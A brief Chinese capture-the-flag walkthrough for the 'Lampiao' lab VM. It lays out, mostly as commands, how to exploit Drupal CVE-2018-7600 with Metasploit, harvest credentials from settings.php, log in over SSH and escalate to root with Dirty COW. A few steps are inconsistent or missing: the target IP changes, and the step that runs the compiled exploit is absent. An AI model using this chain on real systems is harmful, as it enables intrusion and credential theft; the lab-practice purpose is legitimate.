lampiao
1.信息收集
nmap -p- 192.168.14.189
dirb http://192.168.14.189:1898 -X ".txt,.php"
发现更新日志文件CHANGLOG.txt
访问更新日志文件CHANGELOG.txt,发现Drupal版本7.54,存在CVE-2018-7600的Drupal漏洞。
2.漏洞利用
msfconsole #进入msf控制台
search drupal #搜索drupal的版本漏洞
use 1 #使用攻击模块1
set rhosts 192.168.14.140 #设置目的ip
set rport 1898 #设置目标端口
run #运行攻击模块
shell
python -c 'import pty;pty.spawn("/bin/bash")'
cat sites/default/settings.php
ls /home
获得数据库密码Virgulino
获得用户名tiago
ssh tiago@192.168.14.189
3.提权
用kali自带的searchsploit来搜索dirty中的漏洞利用代码
searchsploit dirty
复制一份40847.cpp文件到桌面
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ./
upload /home/kali/Desktop/40847.cpp /tmp 发送40847.cpp到靶机
ls #查看文件是否存在
#编译、运行dirtycow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
cat flag.txt #查看flag.txt文件
注:-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o 指定gcc生成的目标文件名